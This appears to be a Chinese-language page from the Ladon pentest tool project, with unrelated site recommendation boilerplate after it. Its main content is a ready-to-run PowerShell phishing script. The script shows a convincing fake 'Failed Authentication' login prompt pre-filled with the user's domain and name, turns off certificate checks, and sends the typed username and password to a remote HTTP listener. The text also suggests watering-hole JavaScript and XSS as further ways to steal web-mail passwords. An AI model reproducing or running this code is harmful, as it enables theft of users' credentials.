执行以下脚本代码,会弹出十分逼真的基础认证登陆窗口,自动获取用户名和域来提高真实性。
当然也可以使用其它脚本或语言,如JS水坑攻击、XSS截取各种WEB邮箱密码等等多种钩鱼姿势。

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
Add-Type @'
using System;
public class Authorization
{
public static void submit(string usr,string pwd)
{
string url = "http://192.168.1.110:8000/";
System.Net.HttpWebRequest myReq = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(url);
string username = usr;
string password = pwd;
string usernamePassword = username + ":" + password;
System.Net.CredentialCache mycache = new System.Net.CredentialCache();
mycache.Add(new Uri(url), "Basic", new System.Net.NetworkCredential(username, password));
myReq.Credentials = mycache;
myReq.Headers.Add("Authorization", "Basic " + Convert.ToBase64String(new System.Text.ASCIIEncoding().GetBytes(usernamePassword)));
System.Net.WebResponse wr = myReq.GetResponse();
}}
'@
[Authorization]::submit($cred.username, $cred.getnetworkcredential().password)

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.